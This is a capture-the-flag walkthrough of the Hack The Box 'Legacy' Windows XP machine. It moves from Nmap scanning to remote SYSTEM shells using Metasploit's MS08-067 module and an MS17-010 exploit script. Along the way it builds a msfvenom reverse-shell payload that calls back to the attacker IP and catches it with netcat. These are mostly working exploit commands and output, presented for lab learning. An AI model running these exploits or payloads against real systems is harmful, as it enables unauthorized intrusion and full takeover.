Table of Contents
Reconnaissance: Portscan with Nmap
As always, we start by port scan with Nmap to enumerate open ports and service versions. For those who want to know more about Nmap’s commands and options, refer to my Nmap Cheatsheet:
nmap -sC -sV -oA legacy 10.10.10.4
-sC: default script scan
-sV: service version detection against open ports
-oA: Output in the three major formats at onceroot@kali:~/Desktop/htb/legacy# nmap -sC -sV -oA legacy 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:22 EDT Nmap scan report for 10.10.10.4 Host is up (0.27s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows XP microsoft-ds 3389/tcp closed ms-wbt-server Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h30m47s, deviation: 2h07m16s, median: 4d23h00m47s |_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:9c:4d (VMware) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2020-05-08T18:23:37+03:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2)
The results of Nmap scan shows:
| PORT | SERVICE | VERSION |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn |
| 445/tcp | microsoft-ds | Windows XP microsoft-ds |
| 3389/tcp | ms-wbt-server |
nmap -p 139,445 --script vuln -Pn n 10.10.10.4
-p <port ranges>: Set destination port(s)
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
-Pn: Treat all hosts as online -- skip host discovery
-n: Do not resolve hostnames via DNSroot@kali:~/Desktop/htb/legacy# nmap -p 139,445 --script vuln -Pn n 10.10.10.4 Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-03 09:34 EDT Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Failed to resolve "n". Nmap scan report for 10.10.10.4 Host is up (0.27s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
From the result above, we came to know the target appears vulnerable to both of ms08-067 used by Conficker and ms17-010 made famous by Wannacry.
Microsoft Security Bulletin MS08-067 – Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644)
The Conficker Worm | SANS Institute
On October 23, 2008, Microsoft published the following critical security bulletin: MS08-067, Vulnerability in Server Service Could Allow Remote Code Execution (958644).
Exploit: MS08-067 with Metasploit
First things first, we’ll execute “search ms08-067” on MSF to find exploit modules.
msf > search ms08-067msf > search ms08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
MS08-067 Microsoft Server Service Relative Path Stack Corruption
Rapid7′s VulnDB is curated repository of vetted computer software exploits and exploitable vulnerabilities.
We’ll make use of the module “exploit/windows/smb/ms08_067_netapi” from the result and run it after setting required information.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.21
msf exploit(windows/smb/ms08_067_netapi) > runSuccessfully, we can get a shell executed by “NT AUTHORITY\SYSTEM”
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
The following information on the target can be checked with the commands “sysinfo/systeminfo”:
– OS: Microsoft Windows XP Professional
– OS Version: 5.1.2600 Service Pack 3 Build 2600
– Architecutre: x86
– Hotfix: Q147222
– Original Install Date: 16/3/2017, 7:32:23
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1596 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: LEGACY
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: user
Registered Organization: HTB
Product ID: 55274-643-7213323-23904
Original Install Date: 16/3/2017, 7:32:23 ��
System Up Time: 0 Days, 0 Hours, 2 Minutes, 28 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1999 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 511 MB
Available Physical Memory: 366 MB
Virtual Memory: Max Size: 2.048 MB
Virtual Memory: Available: 1.998 MB
Virtual Memory: In Use: 50 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.4
Exploit: MS07-010
We will also show you how to penetrate the target with another exploit “MS07-010” using the python script “send_and_execute.py” for XP machine from helvojunior:
helviojunior/MS17-010
MS17-010. Contribute to helviojunior/MS17-010 development by creating an account on GitHub.
git clone https://github.com/helviojunior/MS17-010This python script requires you to create a payload for reverse shell to be executed after the exploit is successful. So, let’s create the stageless paylaod “windows/shell_reverse_tcp” named as “shell.exe” with Msfvenom. If you don’t know much about Msfvenom’s command options, please see below:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-o, --out: Save the payloadroot@kali:~/Desktop/htb/legacy# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe No encoder or badchars specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes Saved as: shell.exe
After the payload is created, run the script “send_and_execute.py” using the following command with the target ip and the path to payload specified:
python send_and_execute.py 10.10.10.4 ../shell.exeroot@kali:~/Desktop/htb/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ../shell.exe Trying to connect to 10.10.10.4:445 Target OS: Windows 5.1 Using named pipe: browser Groom packets attempt controlling next transaction on x86 success controlling one transaction modify parameter count to 0xffffffff to be able to write backward leak next transaction CONNECTION: 0x81f38570 SESSION: 0xe20e4830 FLINK: 0x7bd48 InData: 0x7ae28 MID: 0xa TRANS1: 0x78b50 TRANS2: 0x7ac90 modify transaction struct for arbitrary read/write make this SMB session to be SYSTEM current TOKEN addr: 0xe21c03f8 userAndGroupCount: 0x3 userAndGroupsAddr: 0xe21c0498 overwriting token UserAndGroups Sending file KE7D5J.exe... Opening SVCManager on 10.10.10.4..... Creating service SFNP..... Starting service SFNP..... The NETBIOS connection with the remote host timed out. Removing service SFNP..... ServiceExec Error on: 10.10.10.4 nca_s_proto_error Done
We can get a shell via a listener started with Netcat beforehand, but it tuns out that whoami.exe for checking current user is not present on the target.
root@kali:~/Desktop/htb/legacy# nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.21] from (UNKNOWN) [10.10.10.4] 1034 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>whoami whoami 'whoami' is not recognized as an internal or external command, operable program or batch file.
What we can do here is to launch smbserver.py for sharing whoami.exe with share name “share” from our attacking machine to the target.
root@kali:~/Desktop/htb/legacy# ls
impacket ms08-067.py MS17-010 shell.exe smbserver.py whoami.exe
root@kali:~/Desktop/htb/legacy# python smbserver.py share .On the target, you can copy whoami.exe to the current folder and run it.
C:\WINDOWS\system32>copy \\10.10.14.21\share\whoami.exe .
copy \\10.10.14.21\share\whoami.exe .
1 file(s) copied.
C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM
Link
- HTB:Legacy | 0xdf hacks stuff
https://0xdf.gitlab.io/2019/02/21/htb-legacy.html